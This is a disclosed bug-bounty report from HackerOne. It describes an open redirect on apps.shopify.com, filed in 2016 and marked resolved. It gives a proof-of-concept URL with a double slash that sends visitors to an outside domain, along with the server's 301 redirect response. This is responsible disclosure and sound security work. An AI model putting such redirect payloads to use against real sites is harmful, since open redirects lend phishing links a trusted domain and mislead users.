[apps.shopify.com] Open Redirect

Disclosed: 2016-09-26 14:02:04 By bobrov To shopify

Unknown

Vulnerability Details

**PoC** `https://apps.shopify.com//blackfan.ru/` **HTTP Response** ``` HTTP/1.1 301 Moved Permanently Server: Cowboy Date: Wed, 17 Aug 2016 11:48:27 GMT Connection: close Location: //blackfan.ru ```

Actions

View on HackerOne

Report Stats

Report ID: 160047
State: Closed
Substate: resolved
Upvotes: 12

[apps.shopify.com] Open Redirect

Vulnerability Details

Actions

Report Stats

Share this report